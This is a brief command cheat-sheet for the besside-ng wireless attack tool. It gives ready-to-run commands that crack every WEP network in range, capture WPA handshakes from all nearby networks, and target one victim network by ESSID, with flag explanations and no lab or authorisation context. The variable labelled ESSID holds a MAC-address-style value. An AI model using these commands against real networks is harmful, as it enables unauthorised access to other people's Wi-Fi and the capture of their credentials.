besside-ng

Automatically crack all the WEP networks in range and log the WPA handshakes.

Attack WPA only

wpa.cap in local dir & capture handshake

# -W: WPA only
# -v: verbose
# Handshake found in besside.log

cd /root/Documents
besside-ng -W -v wlan1

Attack specific ESSID

wpa.cap in local dir

# -v: verbose
# -R: Victim ESSID regex

ESSID="00:00:00:00:00:00"
cd /root/Documents
besside-ng -v -R $ESSID wlan1